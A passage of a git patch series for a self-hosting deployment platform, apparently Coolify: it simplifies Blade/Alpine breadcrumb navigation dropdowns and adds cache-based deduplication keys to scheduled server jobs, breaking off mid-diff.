-                            <a href="{{ route('project.database.resource-limits', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Resource
-                                Limits</a>
-                            <a href="{{ route('project.database.resource-operations', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Resource
-                                Operations</a>
-                            <a href="{{ route('project.database.metrics', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Metrics</a>
-                            <a href="{{ route('project.database.tags', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Tags</a>
-                            <a href="{{ route('project.database.danger', $routeParams) }}" {{ wireNavigate() }}
-                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200 text-red-500">Danger
-                                Zone</a>
-                        @endif
-                        </div>
-                    </div>
-                </div>
-            </div>
+        <li class="inline-flex items-center mr-2">
+            <a class="text-xs truncate lg:text-sm hover:text-warning" {{ wireNavigate() }}
+                href="{{ $isApplication
+                    ? route('project.application.configuration', $routeParams)
+                    : ($isService
+                        ? route('project.service.configuration', $routeParams)
+                        : route('project.database.configuration', $routeParams)) }}"
+                title="{{ data_get($resource, 'name') }}{{ $serverName ? ' ('.$serverName.')' : '' }}">
+                {{ data_get($resource, 'name') }}@if($serverName) <span class="text-xs text-neutral-400">({{ $serverName }})</span>@endif
+            </a>
         </li>
 
         <!-- Current Section Status -->
diff --git a/resources/views/livewire/project/resource/index.blade.php b/resources/views/livewire/project/resource/index.blade.php
index f18df5061..a38a04043 100644
--- a/resources/views/livewire/project/resource/index.blade.php
+++ b/resources/views/livewire/project/resource/index.blade.php
@@ -60,36 +60,13 @@ class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolg
                         </div>
                     </div>
                 </li>
-                <li class="inline-flex items-center" x-data="{ envOpen: false, activeEnv: null, envPositions: {}, activeRes: null, resPositions: {}, activeMenuEnv: null, menuPositions: {}, closeTimeout: null, envTimeout: null, resTimeout: null, menuTimeout: null, toggle() { this.envOpen = !this.envOpen; if (!this.envOpen) { this.activeEnv = null;
-                            this.activeRes = null;
-                            this.activeMenuEnv = null; } }, open() { clearTimeout(this.closeTimeout);
-                        this.envOpen = true }, close() { this.closeTimeout = setTimeout(() => { this.envOpen = false;
-                            this.activeEnv = null;
-                            this.activeRes = null;
-                            this.activeMenuEnv = null; }, 100) }, openEnv(id) { clearTimeout(this.closeTimeout);
-                        clearTimeout(this.envTimeout);
-                        this.activeEnv = id }, closeEnv() { this.envTimeout = setTimeout(() => { this.activeEnv = null;
-                            this.activeRes = null;
-                            this.activeMenuEnv = null; }, 100) }, openRes(id) { clearTimeout(this.envTimeout);
-                        clearTimeout(this.resTimeout);
-                        this.activeRes = id }, closeRes() { this.resTimeout = setTimeout(() => { this.activeRes = null;
-                            this.activeMenuEnv = null; }, 100) }, openMenu(id) { clearTimeout(this.resTimeout);
-                        clearTimeout(this.menuTimeout);
-                        this.activeMenuEnv = id }, closeMenu() { this.menuTimeout = setTimeout(() => { this.activeMenuEnv = null; }, 100) } }">
+                <li class="inline-flex items-center" x-data="{ envOpen: false, activeEnv: null, envPositions: {}, closeTimeout: null, envTimeout: null, toggle() { this.envOpen = !this.envOpen; if (!this.envOpen) { this.activeEnv = null; } }, open() { clearTimeout(this.closeTimeout); this.envOpen = true }, close() { this.closeTimeout = setTimeout(() => { this.envOpen = false; this.activeEnv = null; }, 100) }, openEnv(id) { clearTimeout(this.closeTimeout); clearTimeout(this.envTimeout); this.activeEnv = id }, closeEnv() { this.envTimeout = setTimeout(() => { this.activeEnv = null; }, 100) } }">
                     <div class="flex items-center relative" @mouseenter="open()" @mouseleave="close()">
                         <a class="text-xs truncate lg:text-sm hover:text-warning" {{ wireNavigate() }}
                             href="{{ route('project.resource.index', ['project_uuid' => data_get($parameters, 'project_uuid'), 'environment_uuid' => $environment->uuid]) }}">
                             {{ $environment->name }}
                         </a>
-                        <button type="button" @click.stop="toggle()" class="px-1 text-warning">
-                            <svg class="w-3 h-3 transition-transform" :class="{ 'rotate-90': envOpen }" fill="none"
-                                stroke="currentColor" viewBox="0 0 24 24">
-                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="4" d="M9 5l7 7-7 7">
-                                </path>
-                            </svg>
-                        </button>
 
-                        <!-- Environment Dropdown Container -->
                         <div x-show="envOpen" @click.outside="close()"
                             x-transition:enter="transition ease-out duration-200"
                             x-transition:enter-start="opacity-0 scale-95" x-transition:enter-end="opacity-100 scale-100"
@@ -103,26 +80,25 @@ class="absolute z-20 top-full mt-1 left-0 sm:left-auto max-w-[calc(100vw-1rem)]"
                                 class="relative w-48 bg-white dark:bg-coolgray-100 rounded-md shadow-lg py-1 border border-neutral-200 dark:border-coolgray-200 max-h-96 overflow-y-auto scrollbar">
                                 @foreach ($allEnvironments as $env)
                                     @php
+                                        $envDatabases = collect()
+                                            ->merge($env->postgresqls ?? collect())
+                                            ->merge($env->redis ?? collect())
+                                            ->merge($env->mongodbs ?? collect())
+                                            ->merge($env->mysqls ?? collect())
+                                            ->merge($env->mariadbs ?? collect())
+                                            ->merge($env->keydbs ?? collect())
+                                            ->merge($env->dragonflies ?? collect())
+                                            ->merge($env->clickhouses ?? collect());
                                         $envResources = collect()
-                                            ->merge(
-                                                $env->applications->map(
-                                                    fn($app) => ['type' => 'application', 'resource' => $app],
-                                                ),
-                                            )
-                                            ->merge(
-                                                $env
-                                                    ->databases()
-                                                    ->map(fn($db) => ['type' => 'database', 'resource' => $db]),
-                                            )
-                                            ->merge(
-                                                $env->services->map(
-                                                    fn($svc) => ['type' => 'service', 'resource' => $svc],
-                                                ),
-                                            );
+                                            ->merge($env->applications->map(fn($app) => ['type' => 'application', 'resource' => $app]))
+                                            ->merge($envDatabases->map(fn($db) => ['type' => 'database', 'resource' => $db]))
+                                            ->merge($env->services->map(fn($svc) => ['type' => 'service', 'resource' => $svc]))
+                                            ->sortBy(fn($item) => strtolower($item['resource']->name));
                                     @endphp
                                     <div @mouseenter="openEnv('{{ $env->uuid }}'); envPositions['{{ $env->uuid }}'] = $el.offsetTop - ($el.closest('.overflow-y-auto')?.scrollTop || 0)"
                                         @mouseleave="closeEnv()">
                                         <a href="{{ route('project.resource.index', ['project_uuid' => data_get($parameters, 'project_uuid'), 'environment_uuid' => $env->uuid]) }}"
+                                            {{ wireNavigate() }}
                                             class="flex items-center justify-between gap-2 px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200 {{ $env->uuid === $environment->uuid ? 'dark:text-warning font-semibold' : '' }}"
                                             title="{{ $env->name }}">
                                             <span class="truncate">{{ $env->name }}</span>
@@ -153,7 +129,6 @@ class="flex items-center gap-2 px-4 py-2 text-sm hover:bg-neutral-100 dark:hover
                             <!-- Resources Sub-dropdown (2nd level) -->
                             @foreach ($allEnvironments as $env)
                                 @php
-                                    // Use pre-loaded relations instead of databases() method to avoid N+1 queries
                                     $envDatabases = collect()
                                         ->merge($env->postgresqls ?? collect())
                                         ->merge($env->redis ?? collect())
@@ -164,28 +139,19 @@ class="flex items-center gap-2 px-4 py-2 text-sm hover:bg-neutral-100 dark:hover
                                         ->merge($env->dragonflies ?? collect())
                                         ->merge($env->clickhouses ?? collect());
                                     $envResources = collect()
-                                        ->merge(
-                                            $env->applications->map(
-                                                fn($app) => ['type' => 'application', 'resource' => $app],
-                                            ),
-                                        )
-                                        ->merge(
-                                            $envDatabases->map(fn($db) => ['type' => 'database', 'resource' => $db]),
-                                        )
-                                        ->merge(
-                                            $env->services->map(fn($svc) => ['type' => 'service', 'resource' => $svc]),
-                                        );
+                                        ->merge($env->applications->map(fn($app) => ['type' => 'application', 'resource' => $app]))
+                                        ->merge($envDatabases->map(fn($db) => ['type' => 'database', 'resource' => $db]))
+                                        ->merge($env->services->map(fn($svc) => ['type' => 'service', 'resource' => $svc]));
                                 @endphp
                                 @if ($envResources->count() > 0)
                                     <div x-show="activeEnv === '{{ $env->uuid }}'" x-cloak
                                         x-transition:enter="transition ease-out duration-150"
                                         x-transition:enter-start="opacity-0" x-transition:enter-end="opacity-100"
                                         @mouseenter="openEnv('{{ $env->uuid }}')" @mouseleave="closeEnv()"
-                                        :style="'position: absolute; left: 100%; top: ' + (envPositions[
-                                            '{{ $env->uuid }}'] || 0) + 'px; z-index: 30;'"
+                                        :style="'position: absolute; left: 100%; top: ' + (envPositions['{{ $env->uuid }}'] || 0) + 'px; z-index: 30;'"
                                         class="flex flex-col sm:flex-row items-start pl-1">
                                         <div
-                                            class="relative w-48 bg-white dark:bg-coolgray-100 rounded-md shadow-lg py-1 border border-neutral-200 dark:border-coolgray-200 max-h-96 overflow-y-auto scrollbar">
+                                            class="relative w-56 bg-white dark:bg-coolgray-100 rounded-md shadow-lg py-1 border border-neutral-200 dark:border-coolgray-200 max-h-96 overflow-y-auto scrollbar">
                                             @foreach ($envResources as $envResource)
                                                 @php
                                                     $resType = $envResource['type'];
@@ -207,241 +173,14 @@ class="relative w-48 bg-white dark:bg-coolgray-100 rounded-md shadow-lg py-1 bor
                                                             'database_uuid' => $res->uuid,
                                                         ]),
                                                     };
-                                                    // Use loaded relation to check additional_servers (avoids N+1 query)
-                                                    $resHasMultipleServers =
-                                                        $resType === 'application' &&
-                                                        method_exists($res, 'additional_servers') &&
-                                                        ($res->relationLoaded('additional_servers') ? $res->additional_servers->count() > 0 : false);
-                                                    $resServerName = $resHasMultipleServers
-                                                        ? null
-                                                        : data_get($res, 'destination.server.name');
                                                 @endphp
-                                                <div @mouseenter="openRes('{{ $env->uuid }}-{{ $res->uuid }}'); resPositions['{{ $env->uuid }}-{{ $res->uuid }}'] = $el.offsetTop - ($el.closest('.overflow-y-auto')?.scrollTop || 0)"
-                                                    @mouseleave="closeRes()">
-                                                    <a href="{{ $resRoute }}"
-                                                        class="flex items-center justify-between gap-2 px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200"
-                                                        title="{{ $res->name }}{{ $resServerName ? ' (' . $resServerName . ')' : '' }}">
-                                                        <span class="truncate">{{ $res->name }}@if ($resServerName)
-                                                                <span
-                                                                    class="text-xs text-neutral-400">({{ $resServerName }})</span>
-                                                            @endif
-                                                        </span>
-                                                        <svg class="w-3 h-3 shrink-0" fill="none"
-                                                            stroke="currentColor" viewBox="0 0 24 24">
-                                                            <path stroke-linecap="round" stroke-linejoin="round"
-                                                                stroke-width="4" d="M9 5l7 7-7 7"></path>
-                                                        </svg>
-                                                    </a>
-                                                </div>
+                                                <a href="{{ $resRoute }}" {{ wireNavigate() }}
+                                                    class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200"
+                                                    title="{{ $res->name }}">
+                                                    {{ $res->name }}
+                                                </a>
                                             @endforeach
                                         </div>
-
-                                        <!-- Main Menu Sub-dropdown (3rd level) -->
-                                        @foreach ($envResources as $envResource)
-                                            @php
-                                                $resType = $envResource['type'];
-                                                $res = $envResource['resource'];
-                                                $resParams = [
-                                                    'project_uuid' => $project->uuid,
-                                                    'environment_uuid' => $env->uuid,
-                                                ];
-                                                if ($resType === 'application') {
-                                                    $resParams['application_uuid'] = $res->uuid;
-                                                } elseif ($resType === 'service') {
-                                                    $resParams['service_uuid'] = $res->uuid;
-                                                } else {
-                                                    $resParams['database_uuid'] = $res->uuid;
-                                                }
-                                                $resKey = $env->uuid . '-' . $res->uuid;
-                                            @endphp
-                                            <div x-show="activeRes === '{{ $resKey }}'" x-cloak
-                                                x-transition:enter="transition ease-out duration-150"
-                                                x-transition:enter-start="opacity-0"
-                                                x-transition:enter-end="opacity-100"
-                                                @mouseenter="openRes('{{ $resKey }}')" @mouseleave="closeRes()"
-                                                :style="'position: absolute; left: 100%; top: ' + (resPositions[
-                                                    '{{ $resKey }}'] || 0) + 'px; z-index: 40;'"
-                                                class="flex flex-col sm:flex-row items-start pl-1">
-                                                <!-- Main Menu List -->
-                                                <div
-                                                    class="relative w-48 bg-white dark:bg-coolgray-100 rounded-md shadow-lg py-1 border border-neutral-200 dark:border-coolgray-200">
-                                                    @if ($resType === 'application')
-                                                        <div @mouseenter="openMenu('{{ $resKey }}-config'); menuPositions['{{ $resKey }}-config'] = $el.offsetTop - ($el.closest('.overflow-y-auto')?.scrollTop || 0)"
-                                                            @mouseleave="closeMenu()">
-                                                            <a href="{{ route('project.application.configuration', $resParams) }}"
-                                                                class="flex items-center justify-between gap-2 px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                                                <span>Configuration</span>
-                                                                <svg class="w-3 h-3 shrink-0" fill="none"
-                                                                    stroke="currentColor" viewBox="0 0 24 24">
-                                                                    <path stroke-linecap="round"
-                                                                        stroke-linejoin="round" stroke-width="4"
-                                                                        d="M9 5l7 7-7 7"></path>
-                                                                </svg>
-                                                            </a>
-                                                        </div>
-                                                        <a href="{{ route('project.application.deployment.index', $resParams) }}"
-                                                            class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">Deployments</a>
-                                                        <a href="{{ route('project.application.logs', $resParams) }}"
-                                                            class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">Logs</a>
-                                                        @can('canAccessTerminal')
-                                                            <a href="{{ route('project.application.command', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">Terminal</a>
-                                                        @endcan
-                                                    @elseif ($resType === 'service')
-                                                        <div @mouseenter="openMenu('{{ $resKey }}-config'); menuPositions['{{ $resKey }}-config'] = $el.offsetTop - ($el.closest('.overflow-y-auto')?.scrollTop || 0)"
-                                                            @mouseleave="closeMenu()">
-                                                            <a href="{{ route('project.service.configuration', $resParams) }}"
-                                                                class="flex items-center justify-between gap-2 px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                                                <span>Configuration</span>
-                                                                <svg class="w-3 h-3 shrink-0" fill="none"
-                                                                    stroke="currentColor" viewBox="0 0 24 24">
-                                                                    <path stroke-linecap="round"
-                                                                        stroke-linejoin="round" stroke-width="4"
-                                                                        d="M9 5l7 7-7 7"></path>
-                                                                </svg>
-                                                            </a>
-                                                        </div>
-                                                        <a href="{{ route('project.service.logs', $resParams) }}"
-                                                            class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">Logs</a>
-                                                        @can('canAccessTerminal')
-                                                            <a href="{{ route('project.service.command', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">Terminal</a>
-                                                        @endcan
-                                                    @else
-                                                        <div @mouseenter="openMenu('{{ $resKey }}-config'); menuPositions['{{ $resKey }}-config'] = $el.offsetTop - ($el.closest('.overflow-y-auto')?.scrollTop || 0)"
-                                                            @mouseleave="closeMenu()">
-                                                            <a href="{{ route('project.database.configuration', $resParams) }}"
-                                                                class="flex items-center justify-between gap-2 px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">
-                                                                <span>Configuration</span>
-                                                                <svg class="w-3 h-3 shrink-0" fill="none"
-                                                                    stroke="currentColor" viewBox="0 0 24 24">
-                                                                    <path stroke-linecap="round"
-                                                                        stroke-linejoin="round" stroke-width="4"
-                                                                        d="M9 5l7 7-7 7"></path>
-                                                                </svg>
-                                                            </a>
-                                                        </div>
-                                                        <a href="{{ route('project.database.logs', $resParams) }}"
-                                                            class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">Logs</a>
-                                                        @can('canAccessTerminal')
-                                                            <a href="{{ route('project.database.command', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">Terminal</a>
-                                                        @endcan
-                                                        @if (
-                                                            $res->getMorphClass() === 'App\Models\StandalonePostgresql' ||
-                                                                $res->getMorphClass() === 'App\Models\StandaloneMongodb' ||
-                                                                $res->getMorphClass() === 'App\Models\StandaloneMysql' ||
-                                                                $res->getMorphClass() === 'App\Models\StandaloneMariadb')
-                                                            <a href="{{ route('project.database.backup.index', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm hover:bg-neutral-100 dark:hover:bg-coolgray-200">Backups</a>
-                                                        @endif
-                                                    @endif
-                                                </div>
-
-                                                <!-- Configuration Sub-menu (4th level) -->
-                                                <div x-show="activeMenuEnv === '{{ $resKey }}-config'" x-cloak
-                                                    x-transition:enter="transition ease-out duration-150"
-                                                    x-transition:enter-start="opacity-0"
-                                                    x-transition:enter-end="opacity-100"
-                                                    @mouseenter="openMenu('{{ $resKey }}-config')"
-                                                    @mouseleave="closeMenu()"
-                                                    :style="'position: absolute; left: 100%; top: ' + (menuPositions[
-                                                        '{{ $resKey }}-config'] || 0) + 'px; z-index: 50;'"
-                                                    class="pl-1">
-                                                    <div
-                                                        class="w-52 bg-white dark:bg-coolgray-100 rounded-md shadow-lg py-1 border border-neutral-200 dark:border-coolgray-200 max-h-96 overflow-y-auto scrollbar">
-                                                        @if ($resType === 'application')
-                                                            <a href="{{ route('project.application.configuration', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">General</a>
-                                                            <a href="{{ route('project.application.environment-variables', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Environment
-                                                                Variables</a>
-                                                            <a href="{{ route('project.application.persistent-storage', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Persistent
-                                                                Storage</a>
-                                                            <a href="{{ route('project.application.source', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Source</a>
-                                                            <a href="{{ route('project.application.servers', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Servers</a>
-                                                            <a href="{{ route('project.application.scheduled-tasks.show', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Scheduled
-                                                                Tasks</a>
-                                                            <a href="{{ route('project.application.webhooks', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Webhooks</a>
-                                                            <a href="{{ route('project.application.preview-deployments', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Preview
-                                                                Deployments</a>
-                                                            <a href="{{ route('project.application.healthcheck', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Healthcheck</a>
-                                                            <a href="{{ route('project.application.rollback', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Rollback</a>
-                                                            <a href="{{ route('project.application.resource-limits', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Resource
-                                                                Limits</a>
-                                                            <a href="{{ route('project.application.resource-operations', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Resource
-                                                                Operations</a>
-                                                            <a href="{{ route('project.application.metrics', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Metrics</a>
-                                                            <a href="{{ route('project.application.tags', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Tags</a>
-                                                            <a href="{{ route('project.application.advanced', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Advanced</a>
-                                                            <a href="{{ route('project.application.danger', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200 text-red-500">Danger
-                                                                Zone</a>
-                                                        @elseif ($resType === 'service')
-                                                            <a href="{{ route('project.service.configuration', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">General</a>
-                                                            <a href="{{ route('project.service.environment-variables', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Environment
-                                                                Variables</a>
-                                                            <a href="{{ route('project.service.storages', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Storages</a>
-                                                            <a href="{{ route('project.service.scheduled-tasks.show', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Scheduled
-                                                                Tasks</a>
-                                                            <a href="{{ route('project.service.webhooks', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Webhooks</a>
-                                                            <a href="{{ route('project.service.resource-operations', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Resource
-                                                                Operations</a>
-                                                            <a href="{{ route('project.service.tags', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Tags</a>
-                                                            <a href="{{ route('project.service.danger', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200 text-red-500">Danger
-                                                                Zone</a>
-                                                        @else
-                                                            <a href="{{ route('project.database.configuration', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">General</a>
-                                                            <a href="{{ route('project.database.environment-variables', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Environment
-                                                                Variables</a>
-                                                            <a href="{{ route('project.database.servers', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Servers</a>
-                                                            <a href="{{ route('project.database.persistent-storage', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Persistent
-                                                                Storage</a>
-                                                            <a href="{{ route('project.database.webhooks', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Webhooks</a>
-                                                            <a href="{{ route('project.database.resource-limits', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Resource
-                                                                Limits</a>
-                                                            <a href="{{ route('project.database.resource-operations', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Resource
-                                                                Operations</a>
-                                                            <a href="{{ route('project.database.metrics', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Metrics</a>
-                                                            <a href="{{ route('project.database.tags', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200">Tags</a>
-                                                            <a href="{{ route('project.database.danger', $resParams) }}"
-                                                                class="block px-4 py-2 text-sm truncate hover:bg-neutral-100 dark:hover:bg-coolgray-200 text-red-500">Danger
-                                                                Zone</a>
-                                                        @endif
-                                                    </div>
-                                                </div>
-                                            </div>
-                                        @endforeach
                                     </div>
                                 @endif
                             @endforeach
@@ -656,16 +395,16 @@ function sortFn(a, b) {
     function searchComponent() {
         return {
             search: '',
-            applications: @js($applications),
-            postgresqls: @js($postgresqls),
-            redis: @js($redis),
-            mongodbs: @js($mongodbs),
-            mysqls: @js($mysqls),
-            mariadbs: @js($mariadbs),
-            keydbs: @js($keydbs),
-            dragonflies: @js($dragonflies),
-            clickhouses: @js($clickhouses),
-            services: @js($services),
+            applications: @js($applicationsJs),
+            postgresqls: @js($postgresqlsJs),
+            redis: @js($redisJs),
+            mongodbs: @js($mongodbsJs),
+            mysqls: @js($mysqlsJs),
+            mariadbs: @js($mariadbsJs),
+            keydbs: @js($keydbsJs),
+            dragonflies: @js($dragonfliesJs),
+            clickhouses: @js($clickhousesJs),
+            services: @js($servicesJs),
             filterAndSort(items) {
                 if (this.search === '') {
                     return Object.values(items).sort(sortFn);

From 6aa618e57fe031b5b0b5834e6b711f94cf2d54d7 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 20 Mar 2026 15:44:10 +0100
Subject: [PATCH 097/213] feat(jobs): add cache-based deduplication for delayed
 cron execution

Implements getPreviousRunDate() + cache-based tracking in shouldRunNow()
to prevent duplicate dispatch of scheduled jobs when queue delays push
execution past the cron minute. This resilience ensures jobs catch missed
windows without double-dispatching within the same cron window.

Updated scheduled job dispatches to include dedupKey parameter:
- Docker cleanup operations
- Server connection checks
- Sentinel restart checks
- Server storage checks
- Server patch checks

DockerCleanupJob now dispatches on the 'high' queue for faster processing.

Includes comprehensive test coverage for dedup behavior across different
cron schedules and delay scenarios.
---
 app/Jobs/DockerCleanupJob.php                 |   4 +-
 app/Jobs/ScheduledJobManager.php              |   4 +-
 app/Jobs/ServerManagerJob.php                 |  45 ++++++--
 .../ScheduledJobManagerShouldRunNowTest.php   |  49 +++++++++
 .../ServerManagerJobShouldRunNowTest.php      | 102 ++++++++++++++++++
 5 files changed, 194 insertions(+), 10 deletions(-)
 create mode 100644 tests/Feature/ServerManagerJobShouldRunNowTest.php

diff --git a/app/Jobs/DockerCleanupJob.php b/app/Jobs/DockerCleanupJob.php
index 78ef7f3a2..a8a3cb159 100644
--- a/app/Jobs/DockerCleanupJob.php
+++ b/app/Jobs/DockerCleanupJob.php
@@ -39,7 +39,9 @@ public function __construct(
         public bool $manualCleanup = false,
         public bool $deleteUnusedVolumes = false,
         public bool $deleteUnusedNetworks = false
-    ) {}
+    ) {
+        $this->onQueue('high');
+    }
 
     public function handle(): void
     {
diff --git a/app/Jobs/ScheduledJobManager.php b/app/Jobs/ScheduledJobManager.php
index e68e3b613..ebcd229ed 100644
--- a/app/Jobs/ScheduledJobManager.php
+++ b/app/Jobs/ScheduledJobManager.php
@@ -350,7 +350,7 @@ private function shouldRunNow(string $frequency, string $timezone, ?string $dedu
         $baseTime = $this->executionTime ?? Carbon::now();
         $executionTime = $baseTime->copy()->setTimezone($timezone);
 
-        // No dedup key → simple isDue check (used by docker cleanups)
+        // No dedup key → simple isDue check
         if ($dedupKey === null) {
             return $cron->isDue($executionTime);
         }
@@ -411,7 +411,7 @@ private function processDockerCleanups(): void
                 }
 
                 // Use the frozen execution time for consistent evaluation
-                if ($this->shouldRunNow($frequency, $serverTimezone)) {
+                if ($this->shouldRunNow($frequency, $serverTimezone, "docker-cleanup:{$server->id}")) {
                     DockerCleanupJob::dispatch(
                         $server,
                         false,
diff --git a/app/Jobs/ServerManagerJob.php b/app/Jobs/ServerManagerJob.php
index 730ce547d..d56ff0a8c 100644
--- a/app/Jobs/ServerManagerJob.php
+++ b/app/Jobs/ServerManagerJob.php
@@ -14,6 +14,7 @@
 use Illuminate\Queue\SerializesModels;
 use Illuminate\Support\Carbon;
 use Illuminate\Support\Collection;
+use Illuminate\Support\Facades\Cache;
 use Illuminate\Support\Facades\Log;
 
 class ServerManagerJob implements ShouldBeEncrypted, ShouldQueue
@@ -80,7 +81,7 @@ private function getServers(): Collection
     private function dispatchConnectionChecks(Collection $servers): void
     {
 
-        if ($this->shouldRunNow($this->checkFrequency)) {
+        if ($this->shouldRunNow($this->checkFrequency, dedupKey: 'server-connection-checks')) {
             $servers->each(function (Server $server) {
                 try {
                     // Skip SSH connection check if Sentinel is healthy — its heartbeat already proves connectivity
@@ -129,13 +130,13 @@ private function processServerTasks(Server $server): void
 
         if ($sentinelOutOfSync) {
             // Dispatch ServerCheckJob if Sentinel is out of sync
-            if ($this->shouldRunNow($this->checkFrequency, $serverTimezone)) {
+            if ($this->shouldRunNow($this->checkFrequency, $serverTimezone, "server-check:{$server->id}")) {
                 ServerCheckJob::dispatch($server);
             }
         }
 
         $isSentinelEnabled = $server->isSentinelEnabled();
-        $shouldRestartSentinel = $isSentinelEnabled && $this->shouldRunNow('0 0 * * *', $serverTimezone);
+        $shouldRestartSentinel = $isSentinelEnabled && $this->shouldRunNow('0 0 * * *', $serverTimezone, "sentinel-restart:{$server->id}");
         // Dispatch Sentinel restart if due (daily for Sentinel-enabled servers)
 
         if ($shouldRestartSentinel) {
@@ -149,7 +150,7 @@ private function processServerTasks(Server $server): void
             if (isset(VALID_CRON_STRINGS[$serverDiskUsageCheckFrequency])) {
                 $serverDiskUsageCheckFrequency = VALID_CRON_STRINGS[$serverDiskUsageCheckFrequency];
             }
-            $shouldRunStorageCheck = $this->shouldRunNow($serverDiskUsageCheckFrequency, $serverTimezone);
+            $shouldRunStorageCheck = $this->shouldRunNow($serverDiskUsageCheckFrequency, $serverTimezone, "server-storage-check:{$server->id}");
 
             if ($shouldRunStorageCheck) {
                 ServerStorageCheckJob::dispatch($server);
@@ -157,7 +158,7 @@ private function processServerTasks(Server $server): void
         }
 
         // Dispatch ServerPatchCheckJob if due (weekly)
-        $shouldRunPatchCheck = $this->shouldRunNow('0 0 * * 0', $serverTimezone);
